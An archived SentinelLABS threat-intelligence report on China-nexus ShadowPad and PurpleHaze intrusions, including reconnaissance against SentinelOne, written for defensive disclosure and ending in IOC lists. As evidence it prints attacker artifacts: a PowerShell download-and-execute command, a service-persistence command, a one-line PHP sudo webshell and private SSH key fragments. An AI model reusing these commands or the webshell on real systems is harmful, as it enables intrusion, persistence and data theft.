{ "id": "bb18d8cb-32c7-4b6e-bcfd-83b4d545be73", "created_at": "2026-04-06T00:06:44.798344Z", "updated_at": "2026-04-10T13:12:25.805137Z", "deleted_at": null, "sha1_hash": "d2b4b96425502cfbec3335386b42dd1860650e47", "title": "Follow the Smoke | China-nexus Threat Actors Hammer At the Doors of Top Tier Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 5547451, "plain_text": "Follow the Smoke | China-nexus Threat Actors Hammer At the\r\nDoors of Top Tier Targets\r\nBy Aleksandar Milenkoski \u0026 Tom Hegel\r\nPublished: 2025-06-09 · Archived: 2026-04-05 22:22:56 UTC\r\nExecutive Summary\r\nIn October 2024, SentinelLABS observed and countered a reconnaissance operation targeting SentinelOne,\r\nwhich we track as part of a broader activity cluster named PurpleHaze.\r\nAt the beginning of 2025, we also identified and helped disrupt an intrusion linked to a wider ShadowPad\r\noperation. The affected organization was responsible for managing hardware logistics for SentinelOne\r\nemployees at the time.\r\nA thorough investigation of SentinelOne’s infrastructure, software, and hardware assets confirmed that the\r\nattackers were unsuccessful and SentinelOne was not compromised by any of these activities.\r\nThe PurpleHaze and ShadowPad activity clusters span multiple partially related intrusions into different\r\ntargets occurring between July 2024 and March 2025. The victimology includes a South Asian government\r\nentity, a European media organization, and more than 70 organizations across a wide range of sectors.\r\nWe attribute the PurpleHaze and ShadowPad activity clusters with high confidence to China-nexus threat\r\nactors. We loosely associate some PurpleHaze intrusions with actors that overlap with the suspected\r\nChinese cyberespionage groups publicly reported as APT15 and UNC5174.\r\nThis research underscores the persistent threat Chinese cyberespionage actors pose to global industries and\r\npublic sector organizations, while also highlighting a rarely discussed target they pursue: cybersecurity\r\nvendors.\r\nOverview\r\nThis research outlines threats that SentinelLABS observed and defended against in late 2024 and the first quarter\r\nof 2025. This post expands upon previous SentinelLABS research, which provides an overview of threats against\r\ncybersecurity vendors, including SentinelOne, ranging from financially motivated crimeware to targeted attacks\r\nby nation-state actors. This research focuses specifically on the subset of threats targeting SentinelOne and others\r\nthat we attribute to China-nexus threat actors.\r\nBy disclosing details of the threat activities we have faced, we bring into focus an aspect of the threat landscape\r\nthat has received limited attention in public cyber threat intelligence discourse: the targeting of cybersecurity\r\nvendors. Our objective is to contribute to strengthening industry defenses by promoting transparency and\r\nencouraging collaboration. Cybersecurity companies are high-value targets for threat actors due to their protective\r\nroles, deep visibility into client environments, and ability to disrupt adversary operations. The findings detailed in\r\nthis post highlight the persistent interest of China-nexus actors in these organizations.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 1 of 18\n\nThis research focuses on the following activities targeting SentinelOne, as well as suspected related operations\r\nidentified during our investigations:\r\nAn intrusion into an IT services and logistics organization, which was responsible at the time for managing\r\nhardware logistics for SentinelOne employees.\r\nExtensive remote reconnaissance of SentinelOne servers intentionally reachable from the Internet by virtue\r\nof their functionality.\r\nWe promptly informed the IT services and logistics organization of the intrusion details. A thorough investigation\r\ninto SentinelOne’s infrastructure, software, and hardware assets found no evidence of compromise.\r\nAt this point, it remains unclear whether the perpetrators’ focus was solely on the targeted IT logistics organization\r\nor if they intended to extend their reach to downstream organizations as well. Nevertheless, this case underscores\r\nthe persistent threat posed by suspected Chinese threat actors, who have a history of seeking to establish strategic\r\nfootholds to potentially compromise downstream entities.\r\nAs for the reconnaissance activity, we promptly identified and mapped the threat actor’s infrastructure involved in\r\nthis operation as soon as it began. A thorough investigation of SentinelOne servers probed by the attackers\r\nrevealed no signs of compromise. We assess with high confidence that the threat actor’s activities were limited to\r\nmapping and evaluating the availability of select Internet-facing servers, likely in preparation for potential future\r\nactions. Continuous monitoring of network traffic to our servers, which is part of established and continuing\r\npractice for protecting SentinelOne assets exposed to the Internet, enabled rapid detection and increased scrutiny\r\nto the reconnaissance activities, effectively mitigating any potential risks.\r\nFurther investigations uncovered multiple, partially related intrusions and clusters of activity characteristic of\r\nmodern Chinese-nexus operations:\r\nActivity A: June 2024 intrusion into a South Asian government entity\r\nActivity B: A set of intrusions impacting organizations worldwide occurring between July 2024 and March\r\n2025\r\nActivity C: Intrusion into an IT services and logistics company at the beginning of 2025\r\nActivity D: October 2024 intrusion into the same government entity compromised in June 2024\r\nActivity E: October 2024 reconnaissance activity targeting SentinelOne\r\nActivity F: September 2024 intrusion into a leading European media organization\r\nThe next two sections provide an overview of these activities, including timelines, points of overlap, and our\r\nattribution assessments, followed by concrete technical details, such as observed TTPs, malware, and\r\ninfrastructure to enable other organizations in related sectors to investigate and mitigate similar sets of activity.\r\nOverview | ShadowPad Intrusions\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 2 of 18\n\nShadowPad activity, June 2024 – March 2025\r\nIn June 2024, SentinelLABS observed threat actor activity involving the ShadowPad malware targeting a South\r\nAsian government entity that provides IT solutions and infrastructure across multiple sectors (Activity A). The\r\nShadowPad sample we retrieved was obfuscated using a variant of ScatterBrain, an evolution of the ScatterBee\r\nobfuscation mechanism.\r\nBased on ShadowPad implementation characteristics, we identified additional samples that revealed broader\r\nactivity taking place between July 2024 and March 2025, spanning a wide range of victims globally (Activity B).\r\nUsing C2 netflow and SentinelOne telemetry data, SentinelLABS uncovered over 70 victims across sectors such\r\nas manufacturing, government, finance, telecommunications, and research. Potentially affected SentinelOne\r\ncustomers were proactively contacted by our Threat Discovery and Response (TDR) teams. One of the impacted\r\nentities was an IT services and logistics company, which had been responsible for managing hardware logistics for\r\nSentinelOne employees during that period (Activity C).\r\nWe attribute these intrusions with high confidence to China-nexus actors, with ongoing efforts aimed at\r\ndetermining the specific threat clusters involved. ShadowPad is a closed-source modular backdoor platform used\r\nby multiple suspected China-nexus threat actors to conduct cyberespionage. Google Threat Intelligence Group has\r\nobserved the use of ScatterBrain-obfuscated ShadowPad samples since 2022 and attributes them to clusters\r\nassociated with the suspected Chinese APT umbrella actor APT41.\r\nSeveral of the ShadowPad samples and infrastructure we identified have also been documented in previous public\r\nreporting on recent ShadowPad activities, including research published by TrendMicro, Orange Cyberdefense, and\r\nCheck Point. Some of these activities have included the deployment of ransomware referred to as NailaoLocker,\r\nthough the motive remains unclear, whether for financial gain or as a means of distraction, misattribution, or\r\nremoval of evidence.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 3 of 18\n\nOverview | The PurpleHaze Activity Cluster\r\nPurpleHaze activity, September – October 2024\r\nIn early October 2024, SentinelLABS observed new threat actor activity (Activity D) at the same South Asian\r\ngovernment entity compromised using ShadowPad in June 2024 (Activity A).\r\nThis intrusion involved backdoors that we classify as part of a malware cluster designated GOREshell, our\r\ndesignation for a loose malware cluster that includes the open-source reverse_ssh backdoor and its custom\r\nvariants, which we have observed in targeted attacks. While these variants exhibit variations in implementation,\r\nall share code similarities with the client component of reverse_ssh .\r\nWe track some of the infrastructure used in this intrusion as part of an operational relay box (ORB) network used\r\nby several suspected Chinese cyberespionage actors, particularly a threat group that overlaps with public reporting\r\non APT15. The use of ORB networks is a growing trend among Chinese threat groups, since they can be rapidly\r\nexpanded to create a dynamic and evolving infrastructure that makes tracking cyberespionage operations and their\r\nattribution challenging. APT15, also historically referred to as Ke3Chang and Nylon Typhoon, is a suspected\r\nChinese cyberespionage actor known for its global targeting of critical sectors, including telecommunications,\r\ninformation technology, and government organizations.\r\nFurther, in October 2024, the same month as the activity targeting the South Asian government entity,\r\nSentinelLABS observed remote connections to Internet-facing SentinelOne servers for reconnaissance (Activity\r\nE). Based on significant overlaps in infrastructure management, as well as domain creation and naming practices,\r\nwe associate with high confidence the infrastructure observed in the reconnaissance operation with that used by\r\nthe threat actor targeting the South Asian government entity (Activity D). This suggests the involvement of the\r\nsame threat actor, or of a third-party entity responsible for managing infrastructure for multiple threat groups, a\r\ncommon practice in the Chinese cyberespionage landscape.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 4 of 18\n\nIn late September 2024, a few weeks before the October activities, SentinelLABS observed an intrusion into a\r\nleading European media organization (Activity F). Our investigation revealed overlaps in the tools used during\r\nthis intrusion and the October 2024 activity targeting the South Asian government entity (Activity D). This\r\nincludes the GOREshell backdoor and publicly available tools developed by The Hacker’s Choice (THC), a\r\ncommunity of cybersecurity researchers.\r\nActivity D and Activity F are the first instances in which we have observed THC tooling used in the context of\r\nAPT activities.\r\nWe attribute Activity F with high confidence to a China-nexus actor, loosely associating it with a suspected\r\nChinese initial access broker tracked as UNC5174 by Mandiant. We acknowledge the possibility that post-intrusion activities may have been conducted by a different threat group.\r\nThe threat actor leveraged ORB network infrastructure, which we assess to be operated from China, and exploited\r\nthe CVE-2024-8963 vulnerability together with CVE-2024-8190 to establish an initial foothold, a few days before\r\nthe vulnerabilities were publicly disclosed. This intrusion method suggests the involvement of UNC5174, which is\r\nassessed to be a contractor for China’s Ministry of State Security (MSS) primarily focusing on gaining access and\r\nspecializing in exploiting vulnerabilities in targeted systems. After compromising these systems, UNC5174 is\r\nsuspected of transferring access to other threat actors.\r\nIn January 2025, CISA and the FBI released a joint advisory reporting threat actor activities that also took place in\r\nSeptember 2024, involving the chained exploitation of CVE-2024-8963 and CVE-2024-8190, without providing\r\nspecific attribution assessments. In March 2025, the French Cybersecurity Agency (ANSSI) released its 2024\r\ncyber threat overview report, which documents intrusions that occurred in September 2024, involved the same\r\nvulnerabilities, and show overlaps in TTPs associated with UNC5174.\r\nAdditionally, Mandiant has observed UNC5174 exploiting the CVE-2023-46747 and CVE-2024-1709\r\nvulnerabilities and deploying a publicly available backdoor tracked as GOREVERSE. Strings and code segments\r\nin the public GOREVERSE YARA rule provided by Mandiant match the reverse_ssh backdoor, placing\r\nGOREVERSE in the GOREshell malware cluster, samples of which we observed in both this intrusion and the\r\nOctober 2024 activity targeting the South Asian government entity.\r\nWe collectively track Activity D, E and F as the PurpleHaze threat cluster. While we attribute PurpleHaze with\r\nhigh confidence to China-nexus threat actors, investigations continue to determine the specific threat groups\r\nbehind the activities and their potential links to the June 2024 and later ShadowPad intrusions (Activity A, B, and\r\nC).\r\nWe do not rule out the involvement of distinct threat groups or the possibility of multiple intrusions conducted by\r\nthe same threat actor, especially given the widespread use of publicly available tools and the extensive sharing of\r\nmalware, infrastructure, and operational practices among Chinese threat groups. We also consider the possibility\r\nthat access may have been transferred between different actors, particularly in light of the suspected involvement\r\nof UNC5174.\r\nTechnical Details | ShadowPad Intrusions\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 5 of 18\n\nWe present below technical details on the ShadowPad intrusion into the South Asian government entity in June\r\n2024 (Activity A), as well as on the broader ShadowPad activities that took place between July 2024 and March\r\n2025 (Activity B and C).\r\nActivity A | ShadowPad and ScatterBrain Obfuscation\r\nThis intrusion involved the deployment of a ShadowPad sample named AppSov.exe . The threat actor deployed\r\nAppSov.exe by executing a PowerShell command that performs the following actions:\r\nDownloads a file named x.dat from a remote endpoint using curl.exe after a 60-second delay.\r\nSaves the downloaded file as AppSov.exe in the C:\\ProgramData\\ directory.\r\nLaunches the executable using the Start-Process PowerShell command.\r\nReboots the system after a delay of 30 minutes.\r\nsleep 60;curl.exe -o c:\\programdata\\AppSov.EXE http://[REDACTED]/dompdf/x.dat;start-process c:\\progra\r\nThe endpoint hosting x.dat was a previously compromised system within the same organization. Our analysis\r\nrevealed that malware artifacts had been deployed on this system approximately one month prior to the\r\nShadowPad deployment. These include the agent component of the Nimbo-C2 open-source remote access\r\nframework, as well as a PowerShell script that performs the following actions:\r\nCollects sensitive user data (documents, credentials, and cryptographic material) by recursively searching\r\nC:\\Users\\ for files modified in the previous 600 days and with the following extensions: *.xls ,\r\n*.xlsx , *.ods , *.txt , *.pem , *.cert , and *.pfx .\r\nCopies the collected files to a temporary folder at C:\\windows\\vss\\temp .\r\nArchives the collected files into an archive file named with the system’s MAC address and date, likely for\r\ntracking compromised endpoints.\r\nEncrypts and password-protects the archive using 7-Zip with the password @WsxCFt6\u0026UJMmko0 , ensuring\r\nthe data is obfuscated from inspection.\r\nExfiltrates the encrypted archive via a curl POST request to a hardcoded URL:\r\nhttps[://]45.13.199[.]209/rss/rss.php .\r\nRemoves traces by deleting the temporary folder, archive, and DAT files after exfiltration to avoid\r\ndetection and forensic recovery.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 6 of 18\n\nPowerShell exfiltration script\r\nThe Nimbo-C2 agent was deployed to C:\\ProgramData\\Prefetch\\PfSvc.exe , likely masquerading as a\r\nPrivacyware Privatefirewall executable.\r\nWe have not previously observed the use of Nimbo-C2 or variants of the PowerShell exfiltration script in the\r\ncontext of suspected Chinese APT activity. Previous research has documented the use of Nimbo-C2 in operations\r\nattributed to APT-K-47 (also known as Mysterious Elephant), a threat actor believed to originate from South Asia.\r\nThe deployment of the ShadowPad sample AppSov.exe raises several possibilities:\r\nthe same threat actor conducted both the earlier activity and the ShadowPad deployment,\r\naccess was handed off to, or leveraged by, a second actor, or\r\ntwo distinct actors operated independently within the same environment.\r\nAppSov.exe was obfuscated using a variant of ScatterBrain. The malware uses the domain\r\nnews.imaginerjp[.]com and the IP address 65.38.120[.]110 for C2 communication, leveraging DNS over\r\nHTTPS (DoH) in an attempt to evade detection by Base-64 encoding queried domains and obscuring DNS traffic\r\nfrom monitoring systems.\r\nhttps[:\r\nAppSov.exe is obfuscated using dispatcher routines that alter control flow, displacements placed after each\r\ninvocation of these routines, and opaque predicates. The malware verifies its integrity using the constant values\r\n0x89D17427 , 0x254733D6 , 0x6FE2CF4E , and 0x110302D6 . It is distributed with three modules: one with the ID\r\n0x0A and two with the ID 0x20 . The ShadowPad module IDs designate different types of modules, including\r\nconfiguration data or code that implements malware functionalities such as injection or data theft.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 7 of 18\n\nAppSov.exe: ShadowPad module IDs and sizes\r\nAppSov.exe: Deobfuscated dispatcher routine\r\nFor a detailed overview of the ScatterBrain obfuscation mechanism and additional ShadowPad implementation\r\ndetails, we refer to previous research by Google Threat Intelligence Group.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 8 of 18\n\nActivity B \u0026 C | A Global ShadowPad Operation\r\nBased on various implementation overlaps with AppSov.exe , including configuration data as well as custom\r\ndecryption and integrity verification constant values, we identified multiple additional ShadowPad samples\r\nobfuscated using ScatterBee variants. This also led to the discovery of related infrastructure, including the\r\nShadowPad C2 servers dscriy.chtq[.]net and updata.dsqurey[.]com , as well as the suspected ShadowPad-related domains network.oossafe[.]com and notes.oossafe[.]com .\r\nDeobfuscated integrity verification routine in AppSov.exe\r\nDeobfuscated integrity verification routine in another ShadowPad sample\r\nSome of the samples we identified differ in execution from AppSov.exe . Instead of embedding the full\r\nShadowPad functionality and configuration within a single executable, they are implemented as Windows DLLs\r\ndesigned to be loaded by specific legitimate executables vulnerable to DLL hijacking. These DLLs then load an\r\nexternal file with an eight-character name and the .tmp extension, for example 1D017DF2.tmp .\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 9 of 18\n\nUsing C2 netflow and SentinelOne telemetry data, we identified a broad range of victim organizations\r\ncompromised by the ShadowPad samples we discovered. Between July 2024 and March 2025, this malware was\r\ninvolved in intrusions at over 70 organizations across multiple regions globally, spanning sectors such as\r\nmanufacturing, government, finance, telecommunications, and research. Among the victims was the IT services\r\nand logistics company that was managing hardware logistics for SentinelOne employees at the time (Activity C).\r\nGeographical distribution of victims\r\nWe suspect that the most common initial access vector involved the exploitation of Check Point gateway devices,\r\nconsistent with previous research on this topic. We also observed communication to ShadowPad C2 servers\r\noriginating from Fortinet Fortigate, Microsoft IIS, SonicWall, and CrushFTP servers, suggesting potential\r\nexploitation of these systems as well.\r\nTechnical Details | PurpleHaze\r\nWe present below technical details on intrusions that are part of the PurpleHaze threat cluster: the intrusion into\r\nthe South Asian government entity in October 2024 (Activity D, the same organization compromised using\r\nShadowPad in June 2024), the reconnaissance of SentinelOne infrastructure in October 2024 (Activity E), and the\r\nintrusion into the European media organization in September 2024 (Activity F).\r\nActivity D | GOREshell \u0026 a China-based ORB Network\r\nIn early October 2024, we detected system reconnaissance and malware deployment activities on a workstation\r\nwithin the South Asian government entity. The threat actor executed the ipconfig Windows command to query\r\nnetwork configuration and established a connection to IP address 103.248.61[.]36 on port 443. The adversary\r\nthen created the C:\\Program Files\\VMware\\VGAuth directory and downloaded an archive file named\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 10 of 18\n\nVGAuth1.zip from 103.248.61[.]36 ; after extracting its contents into the VGAuth directory, the archive was\r\ndeleted.\r\nThe archive file contained two executables: a legitimate VGAuthService.exe executable and a malicious DLL file\r\nnamed glib-2.0.dll (original filename: libglib-2.0-0.dll ), which masquerades as a legitimate GLib–2.0\r\nlibrary file.\r\nVGAuthService.exe implements the VMware Guest Authentication Service. The threat actor deployed version\r\n11.3.5.59284 , signed by VMWare and compiled on Tuesday, August 31, 2021, 06:14:07 UTC. This version is\r\nvulnerable to DLL hijacking.\r\nThe threat actor then created a new Windows service named VGAuthService , which automatically starts upon\r\nsystem boot, runs the VGAuthService.exe executable, and displays as Alias Manager and Ticket Service .\r\nWhen the service was started, VGAuthService.exe loaded and executed the malicious glib-2.0.dll library\r\nfile.\r\nsc create VGAuthService binPath= \"\\\"C:\\\\Program Files\\\\VMware\\\\\\VGAuth\\\\VGAuthService.exe\\\"\" start=au\r\nglib-2.0.dll implements the GOREshell backdoor, which uses reverse_ssh functionalities to establish SSH\r\nconnections to attacker-controlled endpoints. The backdoor is implemented in the Go programming language and\r\nobfuscated using Garble, including string literals, package paths, and function names. It uses the cgo library to\r\ninvoke C code.\r\nglib-2.0.dll: Obfuscated form of the string Fail to detect service: %v\r\nglib-2.0.dll contains a private SSH key used for establishing SSH connections to the threat actor’s C2 server.\r\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZWQyNTUxOQAAACABqioIxWKMLg7cKJuRt\r\nThe malware was configured to use downloads.trendav[.]vip for C2 purposes. This domain resolved to\r\n142.93.214[.]219 at the time of the activity. glib-2.0.dll establishes SSH connections over the Websocket\r\nprotocol ( wss[://]downloads.trendav[.]vip:443 ).\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 11 of 18\n\nNetwork request issued by glib-2.0.dll\r\nThe threat actor deployed GOREshell variants not only on Windows systems but also on Linux. This includes two\r\nsamples: one masquerading as the snapd Linux service and the other as the update-notifier service. The\r\nthreat actor deployed both samples as Linux services, which included creating service configuration files, such as\r\n/usr/lib/systemd/system/update-notifier.service .\r\nThe content of update-notifier.service\r\nIn contrast to update-notifier , which is obfuscated using Garble and packed with UPX, snapd is not\r\nobfuscated. Both samples use epp.navy[.]ddns[.]info as their C2 servers and are configured to proxy\r\nconnections through a local IP address over port 8080. Additionally, both samples store the same private SSH key\r\nas glib-2.0.dll .\r\nBased on the private key stored in glib-2.0.dll , snapd , and update-notifier , we discovered an additional\r\nGOREshell variant, which was uploaded on a malware sharing platform in September 2023. This GOREshell\r\nvariant is implemented as a tapisrv.dll library file (Microsoft Windows Telephony Server) and loaded as a\r\nWindows service by the svchost.exe service container process. The malware uses the\r\nmail.ccna[.]organiccrap[.]com domain for C2 purposes.\r\nThe discovery of the tapisrv.dll sample indicates reuse of the private key in intrusions separated by a\r\nconsiderable period.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 12 of 18\n\nPrivate key reuse\r\nWe associate some of the GOREshell C2 infrastructure with an ORB network, which we track as being operated\r\nfrom China and actively used by several suspected Chinese cyberespionage actors, including overlaps with\r\nAPT15.\r\nThe threat actor made significant efforts to obscure their activity and remove evidence of their presence, including\r\ntimestomping GOREshell executable files and deploying a log removal tool on Linux systems, specifically at the\r\n/usr/sbin/mcl filepath.\r\nOur analysis of mcl suggests that the executable is likely a compiled and modified version of the source code of\r\na tool called clear13 , developed by members of The Hacker’s Choice community. The source code of clear13\r\nis publicly available on GitHub.\r\nThe mcl executable is packed using a custom-modified version of UPX. The tool supports four commands,\r\nwhich are presented to the user through a help menu.\r\nCommand\r\nDisplayed\r\nhelp text\r\nDescription\r\nsudo sudo cmd\r\nExecutes a specified command ( cmd ) with elevated privileges using\r\nsudo .\r\nclear clear name\r\nRemoves the last entry containing a specified username ( name ) from\r\n/var/log/wtmp , /var/run/utmp , and /var/log/lastlog .\r\nsecure\r\nsecure\r\ntimeString\r\nRemoves all entries matching a specified pattern ( timeString ) from\r\n/var/log/secure .\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 13 of 18\n\nhistory\r\nhistory\r\nleftNum\r\nTruncates the user command history, keeping only a specified number of\r\nentries ( leftNum ).\r\nActivity E | Probing \u0026 Reconnaissance of SentinelOne Infrastructure\r\nIn October 2024, SentinelLABS observed consistent attempts to establish remote connections to multiple Internet-facing SentinelOne servers over port 443 for reconnaissance purposes.\r\nOur analysis of the infrastructure associated with this activity revealed links to the October 2024 intrusion into the\r\nSouth Asian government entity (Activity D).\r\nWe identified server characteristics and domain registration patterns suggesting coordinated infrastructure\r\nmanagement and bulk domain registration, likely carried out by the same threat actor conducting reconnaissance\r\non SentinelOne infrastructure and involved in Activity D, or by a third-party entity responsible for managing the\r\ninfrastructure used in both activities.\r\nThe connections we initially observed originated from a virtual private server (VPS) that used a C2 server as a\r\nproxy. At the time of the activity, the server had an IP address of 128.199.124[.]136 , which was mapped to the\r\ndomain name tatacom.duckdns[.]org and is designed to appear as part of a major South Asian\r\ntelecommunications provider’s infrastructure.\r\nBased on a unique server fingerprint, SentinelLABS discovered an extensive collection of related network\r\ninfrastructure.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 14 of 18\n\nInfrastructure overview\r\nThe C2 domain downloads.trendav[.]vip , observed in Activity D, resolved to the IP address\r\n142.93.214[.]219 . We also identified this IP address based on the server fingerprint. Furthermore, the IP address\r\nof a server associated with the same fingerprint, 143.244.137[.]54 , was mapped to the domain name\r\ncloud.trendav[.]co in October 2024. This domain name overlaps with downloads.trendav[.]vip .\r\nAdditionally, historical domain registration records show that the root domain trendav[.]vip was originally\r\nregistered through Dynadot Inc., on 24 October 2023, at 13:05:29 UTC. Identifying all domains registered through\r\nthe same registrar at the exact same date and time (to the second) reveals the domains secmailbox[.]us and\r\nsentinelxdr[.]us , the latter of which likely masquerades as SentinelOne infrastructure.\r\nBetween February and April 2025, the sentinelxdr[.]us domain resolved to 142.93.214[.]219 , the same IP\r\naddress that downloads.trendav[.]vip resolved to in October 2024.\r\nIn October 2024, mail.secmailbox[.]us resolved to 142.93.212[.]42 . Like the server at IP address\r\n142.93.214[.]219 ( downloads.trendav[.]vip/sentinelxdr[.]us ), this server shared the same server\r\nfingerprint.\r\nFurthermore, domain registration data for sentinelxdr[.]us was updated on 25 September 2024, at 01:43:46\r\nUTC, a date and time that is identical to an update of the registration data of trendav[.]vip .\r\nActivity F | The Return of dsniff\r\nThe late September 2024 intrusion into the European media organization showed overlaps in tooling with the\r\nOctober 2024 intrusion into the South Asian government entity (Activity D). These overlaps include the use of the\r\nGOREshell backdoor and publicly available tools developed by The Hacker’s Choice community.\r\nThe threat actor deployed a UPX-packed GOREshell sample, which was configured to use 107.173.111[.]26\r\nover the WebSocket protocol for C2 communication ( wss[://]107.173.111[.]26:443 ). The executable file we\r\nretrieved contains a private SSH key and the public SSH key fingerprint\r\nf0746e78e49896dfa01c674bf2a800443b1966c54663db5c679bc86533352590 .\r\nMC4CAQAwBQYDK2VwBCIEIMsHXDEWgXiPFrIjDOSXZqReC2HHiS6kgoZT0YgHlK87\r\nBased on the fingerprint, we identified a Garble-obfuscated GOREshell sample that was uploaded to a malware\r\nsharing platform from Iran in late July 2024. This GOREshell sample also contains a private SSH key and is\r\nconfigured to use the same C2 server, 107.173.111[.]26 , over the TLS protocol\r\n( tls[://]107.173.111[.]26:80 ).\r\nThis suggests threat actor activity since at least July 2024, possibly targeting organizations in both Europe and the\r\nMiddle East.\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 15 of 18\n\nMC4CAQAwBQYDK2VwBCIEINArpOAwJO2+lv9Da+PzmkbKxGhMcapQ+/NhUq4nifvh\r\nThe threat actor also deployed version 2.5a1 of dsniff, a collection of tools for network auditing and penetration\r\ntesting. With active development of dsniff having been discontinued for over 15 years, our investigation of\r\npublic source code repositories revealed that the THC community has released version 2.5a1 in an effort to resume\r\nactive maintenance of the project.\r\nTo obfuscate their presence, the threat actor timestomped deployed executables, setting their creation date to\r\nSeptember 15, 2021. After gaining initial access to the environment, the perpetrators deployed a simple PHP\r\nwebshell that enables remote command execution by passing commands via the a parameter and executing them\r\nwith elevated privileges using sudo .\r\n\u003c?php system('/bin/sudo '. @$_REQUEST['a']);?\u003e\r\nOur investigation of system and network traffic artifacts strongly suggests that the threat actor gained an initial\r\nfoothold by exploiting CVE-2024-8963 in conjunction with CVE-2024-8190 (both Ivanti Cloud Services\r\nAppliance vulnerabilities) on September 5, 2024, a few days before their public disclosure.\r\nWe track some of the malicious infrastructure used in this attack as part of an ORB network, which we suspect is\r\noperated from China and includes compromised network edge devices.\r\nConclusions\r\nThis post highlights the persistent threat posed by China-nexus cyberespionage actors to a wide range of industries\r\nand public sector organizations, including cybersecurity vendors themselves. The activities detailed in this\r\nresearch reflect the strong interest these actors have in the very organizations tasked with defending digital\r\ninfrastructure.\r\nOur findings underscore the critical need for constant vigilance, robust monitoring, and rapid response\r\ncapabilities. By publicly sharing details of our investigations, we aim to provide insight into the rarely discussed\r\ntargeting of cybersecurity vendors, helping to destigmatize sharing of IOCs related to these campaigns, and thus\r\ncontribute to a deeper understanding of the tactics, objectives, and operational patterns of China-nexus threat\r\nactors. As these adversaries continue to adapt to our response efforts, it’s essential that defenders prioritize\r\ntransparency, intelligence sharing, and coordinated action over the fear of reputational harm.\r\nWe encourage others in the industry to adopt a proactive approach to threat intelligence sharing and defense\r\ncoordination, recognizing that collective security strengthens the entire community.\r\nWe are grateful to our partners at Lumen Technologies Black Lotus Labs for their collaboration and support.\r\nIndicators of Compromise\r\nSHA-1 Hashes\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 16 of 18\n\nValue Note\r\n106248206f1c995a76058999ccd6a6d0f420461e Webshell\r\n411180c89953ab5e0c59bd4b835eef740b550823 GOREshell (snapd)\r\n4896cfff334f846079174d3ea2d541eec72690a0 Nimbo-C2 agent (PfSvc.exe)\r\n5ee4be6f82a16ebb1cf8f35481c88c2559e5e41a ShadowPad\r\n7dabf87617d646a9ec3e135b5f0e5edae50cd3b9 GOREshell (update-notifier)\r\na31642046471ec138bb66271e365a01569ff8d7f GOREshell\r\na88f34c0b3a6df683bb89058f8e7a7d534698069 ShadowPad\r\naa6a9c25aff0e773d4189480171afcf7d0f69ad9 ShadowPad\r\nc43b0006b3f7cd88d31aded8579830168a44ba79 ShadowPad\r\ncb2d18fb91f0cd88e82cb36b614cfedf3e4ae49b GOREshell (glib-2.0.dll)\r\ncbe82e23f8920512b1cf56f3b5b0bca61ec137b9 Legitimate VMWare executable (VGAuthService.exe)\r\nebe6068e2161fe359a63007f9febea00399d7ef3 GOREshell\r\nf52e18b7c8417c7573125c0047adb32d8d813529 ShadowPad (AppSov.exe)\r\nDomains\r\nValue Note\r\ncloud.trendav[.]co Suspected PurpleHaze infrastructure\r\ndownloads.trendav[.]vip GOREshell C2 server\r\ndscriy.chtq[.]net ShadowPad C2 server\r\nepp.navy[.]ddns[.]info GOREshell C2 server\r\nmail.ccna[.]organiccrap[.]com GOREshell C2 server\r\nmail.secmailbox[.]us Suspected PurpleHaze infrastructure\r\nnetwork.oossafe[.]com Suspected ShadowPad C2 server\r\nnews.imaginerjp[.]com ShadowPad C2 server\r\nnotes.oossafe[.]com Suspected ShadowPad C2 server\r\nsecmailbox[.]us Suspected PurpleHaze infrastructure\r\nhttps://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/\r\nPage 17 of 18\n\nsentinelxdr[.]us Suspected PurpleHaze infrastructure\r\ntatacom.duckdns[.]org C2 server\r\ntrendav[.]vip Suspected PurpleHaze infrastructure\r\nupdata.dsqurey[.]com ShadowPad C2 server\r\nIP Addresses\r\nValue Note\r\n103.248.61[.]36 Malware hosting location\r\n107.173.111[.]26 GOREshell C2 server\r\n128.199.124[.]136 C2 server\r\n142.93.212[.]42 Suspected PurpleHaze infrastructure\r\n142.93.214[.]219 GOREshell C2 server\r\n143.244.137[.]54 Suspected PurpleHaze infrastructure\r\n45.13.199[.]209 Exfiltration IP address\r\n65.38.120[.]110 ShadowPad C2 